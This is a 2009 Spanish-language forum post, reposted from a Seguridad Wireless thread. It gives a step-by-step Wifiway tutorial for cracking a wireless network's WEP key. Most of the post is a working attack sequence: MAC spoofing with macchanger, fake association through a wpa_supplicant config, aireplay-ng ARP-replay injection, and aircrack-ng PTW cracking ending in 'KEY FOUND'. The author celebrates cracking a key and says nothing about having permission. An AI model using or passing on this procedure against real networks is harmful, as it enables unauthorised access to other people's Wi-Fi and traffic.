Seguridad Wireless - Wifi
Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: ChimoC en 04-03-2009, 09:57 (Miércoles)
-
Esto es un Copy/paste de este hilo, he puesto by Jaco, Bht Sata y Dexter Back... si me dejo a alguien en el tintero... pido disculpas (y enviadme un IM) >:D
https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/inyectar-con-4965/
--------------------------------------------------
Bueno antes de nada tengo que dar las gracias a todas las personas de que han contribuido en este hilo porque gracias a ellos he logrado sacar mi primera wep no perteneciente a una WLAN_XX. ;D
Bueno respecto al post anterior que he hecho me constesto yo mismo ya que seguro que ha alguien le sirve de ayuda:
Los dos comandos que he puesto son perfectamente válidos (en la version actual de wifiway), no obstante es mejor usar aircrack-ng -z ficherodecaptura.cap porque con el otro tienes que ponerle la ruta ubicando el .cap. Personalmente yo uso esto: aircrack-ng -z *.cap asi me quito de escribir el nombre del archivo de captura y además uso el aircrack-ptw ( que para eso es la opción -z). Además de que con la opción -z, personalmente he sacado la clave en 0 segundos (con 30.000 IV's como podeis ver en la captura mas abajo), mientras que sin ella dura mucho mas.
En un humilde intento por ayudar a los que están como yo estaba antes, voy a explicar los pasos que he seguido detalladamente:
-------------------------------------------------------------------------------------------------------------------------------
1º Arranco wifiway, entro en modo gráfico. Abro el airodump y miro que red voy a Auditar, y copio en un .txt aparte toda la info.
2º airmon-ng start wlan0 CHANNEL
3º Creo el wpa.conf
Código:
network={
ssid="ESSID"
key_mgmt=NONE
bssid=BSSID
wep_key0="232323343478787"
}
3º ifconfig wlan0 down
4º macchanger -m 00:11:22:33:44:55 wlan0
5º ifconfig wlan0 up
6º wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0
(http://img122.imageshack.us/img122/4674/asociacionmodqq3.png)
Como podeis ver al primera vez que puse el comando me salió el dichoso bucle infinito: Failed to iniciate AP scan ...
Pero hize Ctrl+C y volvi a poner el mismo comando y ya me asoció, podeis ver lo de CONNECTED.
7º airodump-ng -w dexter-back -c CHANNEL mon0
(http://img244.imageshack.us/img244/1204/airodumpmodsg1.png)
8º aireplay-ng -3 -b MAC DEL AP -h 00:11:22:33:44:55 mon0
(http://img377.imageshack.us/img377/2811/aireplaymodpd5.png)
9º aircrack-ng -z *.cap
10º KEY FOUND!
(http://img357.imageshack.us/img357/5374/aircrackmodjm1.png)
NOTA: Personalmente me comienza a inyectar 2 ó 3 minutos después de ejecutar el aireplay. Sobre el tema de que si estas muy lejos no puedes inyectar.